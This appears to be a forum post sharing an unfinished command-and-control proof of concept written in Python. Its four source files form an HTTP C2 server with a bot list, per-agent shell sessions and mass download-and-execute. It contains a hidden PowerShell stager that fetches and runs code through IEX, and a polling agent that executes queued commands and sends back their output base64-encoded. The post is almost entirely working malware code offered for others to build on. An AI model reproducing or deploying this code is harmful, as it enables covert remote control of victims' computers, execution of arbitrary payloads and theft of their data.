A while back I started to develop a c2 POC, i ended up abandoning it (skill issue). While going through my drive, I stumbled across it again and decided to share. So, if any anyone would like to continue development, be my guest. It’s very basic and got abandoned early on. The idea was to keep it portable (no third part libs and powershell payload) while still making it decent. Right now, it’s got mass download and execute and individual shell sessions it can also handle numerous bots.
list - List connected agentsuse <agent_id> - Interact with an agentdns <url> - Download and execute (remote)payload - Show payloadexit - Shutdown the serverhelp - Show help messageback - Return to main menu
Python:
# c2.py
import argparse
import threading
from listener import CNCServer, CNCRequestHandler
from cmd import cli
from helper import init_logging, log_info
def main():
parser = argparse.ArgumentParser(description="Onliner C2")
parser.add_argument("--lhost", default="127.0.0.1", help="Listening host IP (default: 127.0.0.1)")
parser.add_argument("--lport", type=int, default=80, help="Listening port (default: 80)")
args = parser.parse_args()
IP = args.lhost
PORT = args.lport
PAYLOAD = f"powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://{IP}:{PORT}/payload'))"
init_logging()
server = CNCServer((IP, PORT), CNCRequestHandler, IP, PORT)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
log_info(f"Server started on {IP}:{PORT}")
try:
cli(IP, PORT, PAYLOAD)
except Exception as e:
log_info(f"Main Error: {e}")
finally:
server.shutdown()
server.server_close()
log_info("Server stopped")
if __name__ == "__main__":
main()
Python:
# cmd.py
import sys
import time
from helper import log_info, get_agents, queue_command, get_latest_result
def display_help():
print("Commands:")
print(" list - List connected agents")
print(" use <agent_id> - Interact with an agent")
print(" dne <url> - Download and execute (remote)")
print(" payload - Show payload")
print(" exit - Shutdown the server")
print(" help - Show help message")
print(" back - Return to main menu")
def cli(ip, port, payload):
print(f"Server running on tcp://{ip}:{port}")
log_info(f"CLI started")
display_help()
last_check_time = 0
while True:
try:
current_time = time.time()
if current_time - last_check_time >= 1: # Check every second
result = get_latest_result()
if result:
agent_id, output = result
print(f"\n[Result from {agent_id}] {output.strip()}")
last_check_time = current_time
command = input("$> ").strip().split()
if not command:
continue
cmd = command[0].lower()
if cmd == "exit":
print("Shutting down...")
log_info("CLI shutdown requested")
sys.exit(0)
elif cmd == "help":
display_help()
elif cmd == "list":
agents = get_agents()
if not agents:
print("No agents connected")
else:
print("Agents:")
for aid, info in agents.items():
print(f"ID: {aid}, IP: {info['ip']}, Last Seen: {info['last_seen']}")
elif cmd == "use" and len(command) > 1:
agent_id = command[1]
if agent_id in get_agents():
print(f"Interacting with {agent_id}")
while True:
sub_cmd = input(f"{agent_id}$> ").strip()
if sub_cmd.lower() == "back":
print(f"Leaving session with {agent_id}. Agent remains active.")
break
elif sub_cmd:
queue_command(agent_id, f"cmd.exe /c {sub_cmd}")
print(f"Command queued: {sub_cmd}")
time.sleep(1)
result = get_latest_result(agent_id)
if result:
_, output = result
print(f"[Result] {output.strip()}")
else:
print("Agent not found")
elif cmd == "dne" and len(command) > 1:
url = command[1]
download_cmd = f"IWR -Uri {url} -OutFile temp.exe; Start-Process temp.exe; Remove-Item temp.exe"
for agent_id in get_agents():
queue_command(agent_id, download_cmd)
print(f"Download and execute command sent to all agents: {url}")
elif cmd == "payload":
print(f"Payload: {payload}")
else:
print("Unknown command. Type 'help' for options")
except KeyboardInterrupt:
print("\nShutting down...")
log_info("CLI interrupted")
sys.exit(0)
except Exception as e:
log_info(f"CLI Error: {e}")
print(f"Error: {e}")
Python:
# helper.py
import logging
import os
import time
import base64
AGENTS = {}
COMMANDS = {}
RESULTS = {}
BASE_DIR = os.path.dirname(__file__)
LOG_FILE = os.path.join(BASE_DIR, "c2.log")
def init_logging():
logging.basicConfig(filename=LOG_FILE, level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
log_info("Logging initialized")
def log_info(message):
logging.info(message)
def log_error(message):
logging.error(message)
def get_agents():
return AGENTS
def register_agent(agent_id, ip):
if agent_id not in AGENTS:
AGENTS[agent_id] = {"ip": ip, "last_seen": time.ctime(time.time())}
COMMANDS[agent_id] = []
RESULTS[agent_id] = []
log_info(f"New agent registered: {agent_id} from {ip}")
else:
AGENTS[agent_id]["last_seen"] = time.ctime(time.time())
def queue_command(agent_id, command):
if agent_id in COMMANDS:
COMMANDS[agent_id].append(command)
log_info(f"Command queued for {agent_id}: {command}")
def get_command(agent_id):
if agent_id in COMMANDS and COMMANDS[agent_id]:
return COMMANDS[agent_id].pop(0)
return ""
def store_result(agent_id, result):
if agent_id in RESULTS:
RESULTS[agent_id].append(result)
log_info(f"Result from {agent_id} ({AGENTS[agent_id]['ip']}): {result}")
def get_latest_result(agent_id=None):
if agent_id and agent_id in RESULTS and RESULTS[agent_id]:
return (agent_id, RESULTS[agent_id].pop(0))
elif not agent_id:
for aid in RESULTS:
if RESULTS[aid]:
return (aid, RESULTS[aid].pop(0))
return None
def generate_payload(ip, port):
return f"""
$id = [System.Guid]::NewGuid().ToString();
$url = 'http://{ip}:{port}';
IEX((New-Object Net.WebClient).DownloadString("$url/checkin/$id"));
while ($true) {{
try {{
$cmd = (New-Object Net.WebClient).DownloadString("$url/command/$id");
if ($cmd) {{
$result = IEX $cmd 2>&1 | Out-String;
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($result));
$wc = New-Object Net.WebClient;
$wc.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$wc.UploadString("$url/result/$id", $enc);
}}
}} catch {{
Start-Sleep -Seconds 2;
continue;
}}
Start-Sleep -Seconds 1;
}}
"""
Python:
# listener.py
import http.server
import socketserver
import base64
from urllib.parse import urlparse
from helper import log_info, register_agent, get_command, generate_payload, store_result, get_agents
class CNCRequestHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
log_info(f"{self.client_address[0]} - {format % args}")
def do_GET(self):
parsed_path = urlparse(self.path)
path = parsed_path.path.lower()
if path == "/payload":
self.send_payload()
elif path.startswith("/checkin/"):
agent_id = path.split("/checkin/")[1]
self.handle_checkin(agent_id)
elif path.startswith("/command/"):
agent_id = path.split("/command/")[1]
self.send_command(agent_id)
else:
self.send_response(404)
self.end_headers()
self.wfile.write(b"Not Found")
def do_POST(self):
parsed_path = urlparse(self.path)
path = parsed_path.path.lower()
content_length = int(self.headers.get('Content-Length', 0))
post_data = self.rfile.read(content_length).decode('utf-8', errors='ignore')
if path.startswith("/result/"):
agent_id = path.split("/result/")[1]
self.handle_result(agent_id, post_data)
else:
self.send_response(404)
self.end_headers()
self.wfile.write(b"Not Found")
def send_payload(self):
payload = generate_payload(self.server.ip, self.server.port)
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(payload.encode())
log_info(f"Payload sent to {self.client_address[0]}")
def handle_checkin(self, agent_id):
ip = self.client_address[0]
register_agent(agent_id, ip)
self.send_response(200)
self.end_headers()
self.wfile.write(b"OK")
def send_command(self, agent_id):
command = get_command(agent_id)
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(command.encode())
if command:
log_info(f"Sent command to {agent_id}: {command}")
def handle_result(self, agent_id, data):
if agent_id in get_agents():
decoded_result = base64.b64decode(data).decode('utf-8', errors='ignore')
store_result(agent_id, decoded_result)
self.send_response(200)
self.end_headers()
self.wfile.write(b"OK")
else:
self.send_response(403)
self.end_headers()
self.wfile.write(b"Unknown Agent")
class CNCServer(socketserver.ThreadingTCPServer):
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass, ip, port):
super().__init__(server_address, RequestHandlerClass)
self.ip = ip
self.port = port